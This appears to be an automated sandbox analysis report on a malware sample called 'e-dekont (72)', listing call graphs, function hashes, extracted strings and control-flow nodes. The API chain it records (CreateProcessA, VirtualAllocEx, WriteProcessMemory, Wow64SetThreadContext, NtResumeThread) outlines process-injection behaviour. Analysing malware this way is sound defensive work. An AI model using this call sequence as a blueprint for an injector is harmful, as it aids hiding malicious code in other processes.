57938 6c30ac1 57937->57938 57942 5991d98 57938->57942 57946 5991d88 57938->57946 57939 6c30aff 57943 5991dad 57942->57943 57944 5991dc3 57943->57944 57950 59922b1 57943->57950 57944->57939 57947 5991dad 57946->57947 57948 5991dc3 57947->57948 57949 59922b1 10 API calls 57947->57949 57948->57939 57949->57948 57951 59922bb 57950->57951 57955 5993769 57951->57955 57959 5993778 57951->57959 57956 5993778 57955->57956 57963 5993982 57956->57963 57960 599378d 57959->57960 57962 5993982 10 API calls 57960->57962 57961 599241d 57962->57961 57964 5993c79 57963->57964 57969 5993f61 57964->57969 57984 5993fa8 57964->57984 57998 5993fb8 57964->57998 57965 5993833 57970 5993fc0 57969->57970 57972 5993f6a 57969->57972 58012 5994e59 57970->58012 58017 5994c47 57970->58017 58022 59949a2 57970->58022 58027 5994892 57970->58027 58032 5995053 57970->58032 58037 599515e 57970->58037 58042 5994f5e 57970->58042 58047 5994e3a 57970->58047 58052 59946b8 57970->58052 58056 59952f8 57970->58056 58061 5994b78 57970->58061 57971 5993fef 57971->57965 57972->57965 57985 5993fb8 57984->57985 57987 5994e59 2 API calls 57985->57987 57988 5994b78 2 API calls 57985->57988 57989 59952f8 2 API calls 57985->57989 57990 59946b8 2 API calls 57985->57990 57991 5994e3a 2 API calls 57985->57991 57992 5994f5e 2 API calls 57985->57992 57993 599515e 2 API calls 57985->57993 57994 5995053 2 API calls 57985->57994 57995 5994892 2 API calls 57985->57995 57996 59949a2 2 API calls 57985->57996 57997 5994c47 2 API calls 57985->57997 57986 5993fef 57986->57965 57987->57986 57988->57986 57989->57986 57990->57986 57991->57986 57992->57986 57993->57986 57994->57986 57995->57986 57996->57986 57997->57986 57999 5993fcd 57998->57999 58001 5994e59 2 API calls 57999->58001 58002 5994b78 2 API calls 57999->58002 58003 59952f8 2 API calls 57999->58003 58004 59946b8 2 API calls 57999->58004 58005 5994e3a 2 API calls 57999->58005 58006 5994f5e 2 API calls 57999->58006 58007 599515e 2 API calls 57999->58007 58008 5995053 2 API calls 57999->58008 58009 5994892 2 API calls 57999->58009 58010 59949a2 2 API calls 57999->58010 58011 5994c47 2 API calls 57999->58011 58000 5993fef 58000->57965 58001->58000 58002->58000 58003->58000 58004->58000 58005->58000 58006->58000 58007->58000 58008->58000 58009->58000 58010->58000 58011->58000 58013 59949c8 58012->58013 58014 5994488 58013->58014 58066 6c867d0 58013->58066 58070 6c867cb 58013->58070 58014->57971 58018 5994c51 58017->58018 58074 59975b8 58018->58074 58079 59975a8 58018->58079 58019 5995601 58023 59949ac 58022->58023 58025 6c867cb NtResumeThread 58023->58025 58026 6c867d0 NtResumeThread 58023->58026 58024 5994488 58024->57971 58025->58024 58026->58024 58028 599489c 58027->58028 58030 59975b8 2 API calls 58028->58030 58031 59975a8 2 API calls 58028->58031 58029 5995601 58030->58029 58031->58029 58033 5995075 58032->58033 58093 6c86618 58033->58093 58097 6c86620 58033->58097 58034 5994488 58034->57971 58038 5995180 58037->58038 58040 6c86618 WriteProcessMemory 58038->58040 58041 6c86620 WriteProcessMemory 58038->58041 58039 599474c 58039->57971 58040->58039 58041->58039 58043 5994f80 58042->58043 58045 6c86618 WriteProcessMemory 58043->58045 58046 6c86620 WriteProcessMemory 58043->58046 58044 5994fb0 58045->58044 58046->58044 58048 59955b7 58047->58048 58050 59975b8 2 API calls 58048->58050 58051 59975a8 2 API calls 58048->58051 58049 5995601 58050->58049 58051->58049 58101 59974d0 58052->58101 58106 59974c3 58052->58106 58053 5994488 58053->57971 58119 59977d8 58056->58119 58124 59977cb 58056->58124 58130 5997818 58056->58130 58057 5994488 58057->57971 58062 5994b90 58061->58062 58136 5995ae0 58062->58136 58140 5995ad3 58062->58140 58063 5994ba8 58067 6c86818 NtResumeThread 58066->58067 58069 6c8684d 58067->58069 58069->58014 58071 6c867d0 NtResumeThread 58070->58071 58073 6c8684d 58071->58073 58073->58014 58075 59975cd 58074->58075 58085 6c8651b 58075->58085 58089 6c86520 58075->58089 58076 59975ef 58076->58019 58080 59975ab 58079->58080 58081 599757c 58079->58081 58083 6c8651b VirtualAllocEx 58080->58083 58084 6c86520 VirtualAllocEx 58080->58084 58081->58019 58082 59975ef 58082->58019 58083->58082 58084->58082 58086 6c86560 VirtualAllocEx 58085->58086 58088 6c8659d 58086->58088 58088->58076 58090 6c86560 VirtualAllocEx 58089->58090 58092 6c8659d 58090->58092 58092->58076 58094 6c86620 WriteProcessMemory 58093->58094 58096 6c866bf 58094->58096 58096->58034 58098 6c86668 WriteProcessMemory 58097->58098 58100 6c866bf 58098->58100 58100->58034 58102 59974e5 58101->58102 58111 6c860fb 58102->58111 58115 6c86100 58102->58115 58103 59974fe 58103->58053 58107 59974d0 58106->58107 58109 6c860fb Wow64SetThreadContext 58107->58109 58110 6c86100 Wow64SetThreadContext 58107->58110 58108 59974fe 58108->58053 58109->58108 58110->58108 58112 6c86145 Wow64SetThreadContext 58111->58112 58114 6c8618d 58112->58114 58114->58103 58116 6c86145 Wow64SetThreadContext 58115->58116 58118 6c8618d 58116->58118 58118->58103 58120 59977ed 58119->58120 58122 6c860fb Wow64SetThreadContext 58120->58122 58123 6c86100 Wow64SetThreadContext 58120->58123 58121 5997806 58121->58057 58122->58121 58123->58121 58125 59977d3 58124->58125 58126 59977a4 58124->58126 58128 6c860fb Wow64SetThreadContext 58125->58128 58129 6c86100 Wow64SetThreadContext 58125->58129 58126->58057 58127 5997806 58127->58057 58128->58127 58129->58127 58131 59977ec 58130->58131 58133 5997823 58131->58133 58134 6c860fb Wow64SetThreadContext 58131->58134 58135 6c86100 Wow64SetThreadContext 58131->58135 58132 5997806 58132->58057 58133->58057 58134->58132 58135->58132 58137 5995af7 58136->58137 58138 5995b19 58137->58138 58144 5995dfe 58137->58144 58138->58063 58141 5995ae0 58140->58141 58142 5995b19 58141->58142 58143 5995dfe 2 API calls 58141->58143 58142->58063 58143->58142 58148 6c85dfb 58144->58148 58153 6c85e00 58144->58153 58149 5995be3 58148->58149 58150 6c85dfe CreateProcessA 58148->58150 58152 6c85fec 58150->58152 58154 6c85e64 CreateProcessA 58153->58154 58156 6c85fec 58154->58156 57905 6cfee68 57906 6cfeea8 VirtualAlloc 57905->57906 57908 6cfeee2 57906->57908 58157 14ed030 58158 14ed048 58157->58158 58159 14ed0a3 58158->58159 58161 6cfe458 58158->58161 58162 6cfe480 58161->58162 58165 6cfe918 58162->58165 58163 6cfe4a7 58166 6cfe945 58165->58166 58167 6cfd9a0 VirtualProtect 58166->58167 58169 6cfeadb 58166->58169 58168 6cfeacc 58167->58168 58168->58163 58169->58163

                                                                Executed Functions

                                                                Function 06C35E1F Relevance: 16.1, Strings: 12, Instructions: 1140COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ,nq$4$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq
                                                                • API String ID: 0-162385967
                                                                • Opcode ID: dd12aeb14685549105014b1cb34f0687078aa24903db070d58573015c80c2571
                                                                • Instruction ID: bf32b1281abaadc61434faa33eab994c86b75808dbff2e06811af2e9f26e004c
                                                                • Opcode Fuzzy Hash: dd12aeb14685549105014b1cb34f0687078aa24903db070d58573015c80c2571
                                                                • Instruction Fuzzy Hash: 4FB21634A002289FDB54DFA9C994BADB7B6FF48700F1485A9E505AB3A5CB70ED81CF50
                                                                Function 06C36147 Relevance: 8.0, Strings: 6, Instructions: 495COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ,nq$4$$jq$$jq$$jq$$jq
                                                                • API String ID: 0-3947795074
                                                                • Opcode ID: 3abad8d8f9d6ea220a880e067ef2a681806edf75746c2d0be923f9a0a8e1892a
                                                                • Instruction ID: adf056dd8b66c74bceaae58a7dcb6e8c97a69878a28b5bba1ae2880a2e4d3507
                                                                • Opcode Fuzzy Hash: 3abad8d8f9d6ea220a880e067ef2a681806edf75746c2d0be923f9a0a8e1892a
                                                                • Instruction Fuzzy Hash: C3220B34A00228DFDB64DFA5C994BADB7B2FF49304F1481A9E509AB3A5DB319D81CF50
                                                                Function 02E17C38 Relevance: 7.2, Strings: 5, Instructions: 983COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 647 2e17c38-2e17c59 648 2e17c60-2e17d47 647->648 649 2e17c5b 647->649 651 2e18449-2e18471 648->651 652 2e17d4d-2e17e8e call 2e143e0 648->652 649->648 655 2e18b77-2e18b80 651->655 698 2e18412-2e1843c 652->698 699 2e17e94-2e17eef 652->699 656 2e18b86-2e18b9d 655->656 657 2e1847f-2e18489 655->657 660 2e18490-2e18584 call 2e143e0 657->660 661 2e1848b 657->661 681 2e18586-2e18592 660->681 682 2e185ae 660->682 661->660 684 2e18594-2e1859a 681->684 685 2e1859c-2e185a2 681->685 683 2e185b4-2e185d4 682->683 689 2e18634-2e186b4 683->689 690 2e185d6-2e1862f 683->690 687 2e185ac 684->687 685->687 687->683 710 2e186b6-2e18709 689->710 711 2e1870b-2e1874e call 2e143e0 689->711 704 2e18b74 690->704 712 2e18446-2e18447 698->712 713 2e1843e 698->713 705 2e17ef1 699->705 706 2e17ef4-2e17eff 699->706 704->655 705->706 709 2e18327-2e1832d 706->709 714 2e18333-2e183af call 2e133b4 709->714 715 2e17f04-2e17f22 709->715 737 2e18759-2e18762 710->737 711->737 712->651 713->712 759 2e183fc-2e18402 714->759 717 2e17f24-2e17f28 715->717 718 2e17f79-2e17f8e 715->718 717->718 724 2e17f2a-2e17f35 717->724 722 2e17f90 718->722 723 2e17f95-2e17fab 718->723 722->723 727 2e17fb2-2e17fc9 723->727 728 2e17fad 723->728 729 2e17f6b-2e17f71 724->729 732 2e17fd0-2e17fe6 727->732 733 2e17fcb 727->733 728->727 735 2e17f73-2e17f74 729->735 736 2e17f37-2e17f3b 729->736 740 2e17fe8 732->740 741 2e17fed-2e17ff4 732->741 733->732 743 2e17ff7-2e18062 735->743 738 2e17f41-2e17f59 736->738 739 2e17f3d 736->739 744 2e187c2-2e187d1 737->744 745 2e17f60-2e17f68 738->745 746 2e17f5b 738->746 739->738 740->741 741->743 748 2e18064-2e18070 743->748 749 2e18076-2e1822b 743->749 750 2e187d3-2e1885b 744->750 751 2e18764-2e1878c 744->751 745->729 746->745 748->749 756 2e1822d-2e18231 749->756 757 2e1828f-2e182a4 749->757 786 2e189d4-2e189e0 750->786 753 2e18793-2e187bc 751->753 754 2e1878e 751->754 753->744 754->753 756->757 762 2e18233-2e18242 756->762 764 2e182a6 757->764 765 2e182ab-2e182cc 757->765 760 2e183b1-2e183f9 759->760 761 2e18404-2e1840a 759->761 760->759 761->698 767 2e18281-2e18287 762->767 764->765 768 2e182d3-2e182f2 765->768 769 2e182ce 765->769 773 2e18244-2e18248 767->773 774 2e18289-2e1828a 767->774 770 2e182f4 768->770 771 2e182f9-2e18319 768->771 769->768 770->771 779 2e18320 771->779 780 2e1831b 771->780 777 2e18252-2e18273 773->777 778 2e1824a-2e1824e 773->778 781 2e18324 774->781 782 2e18275 777->782 783 2e1827a-2e1827e 777->783 778->777 779->781 780->779 781->709 782->783 783->767 788 2e18860-2e18869 786->788 789 2e189e6-2e18a41 786->789 790 2e18872-2e189c8 788->790 791 2e1886b 788->791 804 2e18a43-2e18a76 789->804 805 2e18a78-2e18aa2 789->805 806 2e189ce 790->806 791->790 793 2e18902-2e18942 791->793 794 2e18947-2e18987 791->794 795 2e18878-2e188b8 791->795 796 2e188bd-2e188fd 791->796 793->806 794->806 795->806 796->806 813 2e18aab-2e18b3e 804->813 805->813 806->786 817 2e18b45-2e18b65 813->817 817->704
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2041545680.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e10000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: TJoq$Tejq$Vv}$pnq$xbmq
                                                                • API String ID: 0-3803770593
                                                                • Opcode ID: 1519e90aa4f2a9b2c9642f714ced6bf865d0be24d7151c39d5d7885608189835
                                                                • Instruction ID: 9376d42c715eec7d5889332f1d352e7967704c83913dcf7110aff2e1e5de64d3
                                                                • Opcode Fuzzy Hash: 1519e90aa4f2a9b2c9642f714ced6bf865d0be24d7151c39d5d7885608189835
                                                                • Instruction Fuzzy Hash: BAA2C575A00628CFDB65CF69C984AD9BBB2FF89304F1481E9D509AB365DB319E81CF40
                                                                Function 02E17C29 Relevance: 4.0, Strings: 3, Instructions: 243COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1082 2e17c29-2e17c59 1083 2e17c60-2e17d47 1082->1083 1084 2e17c5b 1082->1084 1086 2e18449-2e18471 1083->1086 1087 2e17d4d-2e17e8e call 2e143e0 1083->1087 1084->1083 1090 2e18b77-2e18b80 1086->1090 1133 2e18412-2e1843c 1087->1133 1134 2e17e94-2e17eef 1087->1134 1091 2e18b86-2e18b9d 1090->1091 1092 2e1847f-2e18489 1090->1092 1095 2e18490-2e18584 call 2e143e0 1092->1095 1096 2e1848b 1092->1096 1116 2e18586-2e18592 1095->1116 1117 2e185ae 1095->1117 1096->1095 1119 2e18594-2e1859a 1116->1119 1120 2e1859c-2e185a2 1116->1120 1118 2e185b4-2e185d4 1117->1118 1124 2e18634-2e186b4 1118->1124 1125 2e185d6-2e1862f 1118->1125 1122 2e185ac 1119->1122 1120->1122 1122->1118 1145 2e186b6-2e18709 1124->1145 1146 2e1870b-2e1874e call 2e143e0 1124->1146 1139 2e18b74 1125->1139 1147 2e18446-2e18447 1133->1147 1148 2e1843e 1133->1148 1140 2e17ef1 1134->1140 1141 2e17ef4-2e17eff 1134->1141 1139->1090 1140->1141 1144 2e18327-2e1832d 1141->1144 1149 2e18333-2e183af call 2e133b4 1144->1149 1150 2e17f04-2e17f22 1144->1150 1172 2e18759-2e18762 1145->1172 1146->1172 1147->1086 1148->1147 1194 2e183fc-2e18402 1149->1194 1152 2e17f24-2e17f28 1150->1152 1153 2e17f79-2e17f8e 1150->1153 1152->1153 1159 2e17f2a-2e17f35 1152->1159 1157 2e17f90 1153->1157 1158 2e17f95-2e17fab 1153->1158 1157->1158 1162 2e17fb2-2e17fc9 1158->1162 1163 2e17fad 1158->1163 1164 2e17f6b-2e17f71 1159->1164 1167 2e17fd0-2e17fe6 1162->1167 1168 2e17fcb 1162->1168 1163->1162 1170 2e17f73-2e17f74 1164->1170 1171 2e17f37-2e17f3b 1164->1171 1175 2e17fe8 1167->1175 1176 2e17fed-2e17ff4 1167->1176 1168->1167 1178 2e17ff7-2e18062 1170->1178 1173 2e17f41-2e17f59 1171->1173 1174 2e17f3d 1171->1174 1179 2e187c2-2e187d1 1172->1179 1180 2e17f60-2e17f68 1173->1180 1181 2e17f5b 1173->1181 1174->1173 1175->1176 1176->1178 1183 2e18064-2e18070 1178->1183 1184 2e18076-2e1822b 1178->1184 1185 2e187d3-2e1885b 1179->1185 1186 2e18764-2e1878c 1179->1186 1180->1164 1181->1180 1183->1184 1191 2e1822d-2e18231 1184->1191 1192 2e1828f-2e182a4 1184->1192 1221 2e189d4-2e189e0 1185->1221 1188 2e18793-2e187bc 1186->1188 1189 2e1878e 1186->1189 1188->1179 1189->1188 1191->1192 1197 2e18233-2e18242 1191->1197 1199 2e182a6 1192->1199 1200 2e182ab-2e182cc 1192->1200 1195 2e183b1-2e183f9 1194->1195 1196 2e18404-2e1840a 1194->1196 1195->1194 1196->1133 1202 2e18281-2e18287 1197->1202 1199->1200 1203 2e182d3-2e182f2 1200->1203 1204 2e182ce 1200->1204 1208 2e18244-2e18248 1202->1208 1209 2e18289-2e1828a 1202->1209 1205 2e182f4 1203->1205 1206 2e182f9-2e18319 1203->1206 1204->1203 1205->1206 1214 2e18320 1206->1214 1215 2e1831b 1206->1215 1212 2e18252-2e18273 1208->1212 1213 2e1824a-2e1824e 1208->1213 1216 2e18324 1209->1216 1217 2e18275 1212->1217 1218 2e1827a-2e1827e 1212->1218 1213->1212 1214->1216 1215->1214 1216->1144 1217->1218 1218->1202 1223 2e18860-2e18869 1221->1223 1224 2e189e6-2e18a41 1221->1224 1225 2e18872-2e189c8 1223->1225 1226 2e1886b 1223->1226 1239 2e18a43-2e18a76 1224->1239 1240 2e18a78-2e18aa2 1224->1240 1241 2e189ce 1225->1241 1226->1225 1228 2e18902-2e18942 1226->1228 1229 2e18947-2e18987 1226->1229 1230 2e18878-2e188b8 1226->1230 1231 2e188bd-2e188fd 1226->1231 1228->1241 1229->1241 1230->1241 1231->1241 1248 2e18aab-2e18b3e 1239->1248 1240->1248 1241->1221 1252 2e18b45-2e18b65 1248->1252 1252->1139
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2041545680.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e10000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: TJoq$Tejq$xbmq
                                                                • API String ID: 0-903294719
                                                                • Opcode ID: f513a5f416bcbfadb8cf0a90b065bec5cad0410792b579fb10ce69add58de14c
                                                                • Instruction ID: 561f1b2182c16b273298d7ad1c61564595c19276c6fc60f0b21aa4f4ae6a3c43
                                                                • Opcode Fuzzy Hash: f513a5f416bcbfadb8cf0a90b065bec5cad0410792b579fb10ce69add58de14c
                                                                • Instruction Fuzzy Hash: 4FC16675E016188FDB58DF6AD944ADDBBF2BF89300F14C0AAD809AB365DB305A81CF50
                                                                Function 06C81D18 Relevance: 3.1, Strings: 2, Instructions: 632COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1254 6c81d18-6c81d39 1255 6c81d3b 1254->1255 1256 6c81d40-6c81dbb call 6c828d7 1254->1256 1255->1256 1261 6c81dc1-6c81dfe 1256->1261 1263 6c81e0d 1261->1263 1264 6c81e00-6c81e0b 1261->1264 1265 6c81e17-6c81f32 1263->1265 1264->1265 1276 6c81f44-6c81f6f 1265->1276 1277 6c81f34-6c81f3a 1265->1277 1278 6c827ae-6c827ca 1276->1278 1277->1276 1279 6c827d0-6c827eb 1278->1279 1280 6c81f74-6c820f2 1278->1280 1291 6c82104-6c822c4 1280->1291 1292 6c820f4-6c820fa 1280->1292 1304 6c82329-6c82333 1291->1304 1305 6c822c6-6c822ca 1291->1305 1292->1291 1308 6c82590-6c825af 1304->1308 1306 6c822cc-6c822cd 1305->1306 1307 6c822d2-6c82324 1305->1307 1309 6c82635-6c826a0 1306->1309 1307->1309 1310 6c82338-6c82499 1308->1310 1311 6c825b5-6c825df 1308->1311 1327 6c826b2-6c826fa 1309->1327 1328 6c826a2-6c826a8 1309->1328 1341 6c82589-6c8258a 1310->1341 1342 6c8249f-6c82586 1310->1342 1316 6c825e1-6c8262f 1311->1316 1317 6c82632-6c82633 1311->1317 1316->1317 1317->1309 1329 6c82700-6c82795 1327->1329 1330 6c82796-6c827ab 1327->1330 1328->1327 1329->1330 1330->1278 1341->1308 1342->1341
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052729526.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c80000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: foq$8
                                                                • API String ID: 0-1333828210
                                                                • Opcode ID: 77c7849bd6fda048657bc26b08e63840683a3d5c5a467d3598581db770969ae7
                                                                • Instruction ID: 908b15175b46b5a19b2cb79e45fe008054072d10ad140d8b70e1dd266bd75070
                                                                • Opcode Fuzzy Hash: 77c7849bd6fda048657bc26b08e63840683a3d5c5a467d3598581db770969ae7
                                                                • Instruction Fuzzy Hash: C462C775E006298FDB64DF69C854AD9B7B1FF9A300F1086EAD509A7354DB30AE81CF90
                                                                Function 06C318CF Relevance: 1.7, Strings: 1, Instructions: 456COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Tejq
                                                                • API String ID: 0-2468842661
                                                                • Opcode ID: 9c4e88ff4442cc06be78388ad690c52c585f49f637dc2e2c76188fb21229e711
                                                                • Instruction ID: b99d293e0ab50e6e0e35ddf5b03c9e1185bb4a53585956bc4edae7fc2300d38d
                                                                • Opcode Fuzzy Hash: 9c4e88ff4442cc06be78388ad690c52c585f49f637dc2e2c76188fb21229e711
                                                                • Instruction Fuzzy Hash: 9E222F74A00228CFEB64DF69D854B9AB7F2FB8A300F1481AAC509E7754DB749E85CF50
                                                                Function 06C31900 Relevance: 1.7, Strings: 1, Instructions: 444COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Tejq
                                                                • API String ID: 0-2468842661
                                                                • Opcode ID: 842f7f45bb30e0300e1d081bf3c3d09592950031d1507dd16759dbcc12b16ac8
                                                                • Instruction ID: 3922887e138475cf1d676f80f487bd30832275f67af1aa5420a13aaa52379670
                                                                • Opcode Fuzzy Hash: 842f7f45bb30e0300e1d081bf3c3d09592950031d1507dd16759dbcc12b16ac8
                                                                • Instruction Fuzzy Hash: 27121074A04228CFEBA4DF6AD854BA9B7F2FB4A300F1081AAD509E7754DB745E84CF50
                                                                Function 06C3215C Relevance: 1.7, Strings: 1, Instructions: 409COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Tejq
                                                                • API String ID: 0-2468842661
                                                                • Opcode ID: 25821c0116b9fe3d891fb0e3a4b36a9cdc42e1dba5f0cb0377137b843368122e
                                                                • Instruction ID: ba30dc94aec9190c913818c6eeeab7d1a648fbefd44ce6b35b187c4335b9d1ee
                                                                • Opcode Fuzzy Hash: 25821c0116b9fe3d891fb0e3a4b36a9cdc42e1dba5f0cb0377137b843368122e
                                                                • Instruction Fuzzy Hash: 0212F178A00228CFEB64DF69D894B99B7F2FB5A300F1081AAD509E7754DB749E84CF50
                                                                Function 05997F73 Relevance: 1.6, Strings: 1, Instructions: 336COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2050688982.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5990000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 0&,
                                                                • API String ID: 0-1722624584
                                                                • Opcode ID: a65dd0cbece834450cde2e55eb16864fa41828af595aa71005060d476628829e
                                                                • Instruction ID: 56385122d52e0de8cf8b4f2df3527eb7e58e5f326b1c8efc27eb1763f1e73ba8
                                                                • Opcode Fuzzy Hash: a65dd0cbece834450cde2e55eb16864fa41828af595aa71005060d476628829e
                                                                • Instruction Fuzzy Hash: 88D148B4A05208CFDB58EFA8D558BEDB7F6FB5A300F1081A9D409A7395CB349985CF41
                                                                Function 06C85790 Relevance: 1.6, APIs: 1, Instructions: 66nativeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06C85821
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052729526.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c80000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID: MemoryProtectVirtual
                                                                • String ID:
                                                                • API String ID: 2706961497-0
                                                                • Opcode ID: ef05dbacd277b052900dbfbe996a24a0ec8ab0cdfd241abb83edae8ca5e57f1e
                                                                • Instruction ID: 2666b7014500577237c41f16dc3fbdb916ccc1d9df73f316bd44d5d70b41bf97
                                                                • Opcode Fuzzy Hash: ef05dbacd277b052900dbfbe996a24a0ec8ab0cdfd241abb83edae8ca5e57f1e
                                                                • Instruction Fuzzy Hash: 9921F4B1D013099FCB10DFAAD984AEEFBF5FF48310F60842AE519A7250C7759944CBA0
                                                                Function 06C85798 Relevance: 1.6, APIs: 1, Instructions: 63nativeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06C85821
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052729526.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c80000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID: MemoryProtectVirtual
                                                                • String ID:
                                                                • API String ID: 2706961497-0
                                                                • Opcode ID: c9911002c180ee31bfe10318a2547163536fb6c394192e472d86432a87dad7cb
                                                                • Instruction ID: b46c017f5b349ad6381469d753c6de3538dbd7f89397e276fe3ddbb4e21d3952
                                                                • Opcode Fuzzy Hash: c9911002c180ee31bfe10318a2547163536fb6c394192e472d86432a87dad7cb
                                                                • Instruction Fuzzy Hash: C421E4B1D013499FCB10DFAAD984AEEFBF5FF48310F60842AE519A7250C775A944CBA1
                                                                Function 06C867CB Relevance: 1.6, APIs: 1, Instructions: 57nativethreadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • NtResumeThread.NTDLL(?,?), ref: 06C8683E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052729526.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c80000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID: ResumeThread
                                                                • String ID:
                                                                • API String ID: 947044025-0
                                                                • Opcode ID: 4d003bbaa44eb99419b884868ab0458a29b4f5570ad91ebf5a9d38dee07b4774
                                                                • Instruction ID: b677e524a9c64ef1d48318b01829552974c70d5dedb50f32de77802ab54e92de
                                                                • Opcode Fuzzy Hash: 4d003bbaa44eb99419b884868ab0458a29b4f5570ad91ebf5a9d38dee07b4774
                                                                • Instruction Fuzzy Hash: D21108B1D002499EDB10DFAAC444AAFFBF4EF59314F10842AD419A7250CB79A944CFA1
                                                                Function 06C867D0 Relevance: 1.6, APIs: 1, Instructions: 54nativethreadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • NtResumeThread.NTDLL(?,?), ref: 06C8683E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052729526.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c80000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID: ResumeThread
                                                                • String ID:
                                                                • API String ID: 947044025-0
                                                                • Opcode ID: ad7838c11eb4dadd9abb2c8d241767537011b1db3cbe6ea31542ca196408496a
                                                                • Instruction ID: 4f8808fb378f4e76f7de864682d01fa80b49524c9b96f600cfb519bdb71cb38d
                                                                • Opcode Fuzzy Hash: ad7838c11eb4dadd9abb2c8d241767537011b1db3cbe6ea31542ca196408496a
                                                                • Instruction Fuzzy Hash: 1411E7B1D002498EDB10DFAAC5446AFFBF4FF49314F10842AD519A7250CB79A944CFA1
                                                                Function 06C88A03 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052729526.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c80000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: c&A
                                                                • API String ID: 0-2748024365
                                                                • Opcode ID: d05c5ed885d477157585628488ba39d742ca923ed1e0595688dbe09574b0d336
                                                                • Instruction ID: 7471b9ce0c3044107871009e3b3bc377c4d07cd3fd33e33d9da6c48269bd2521
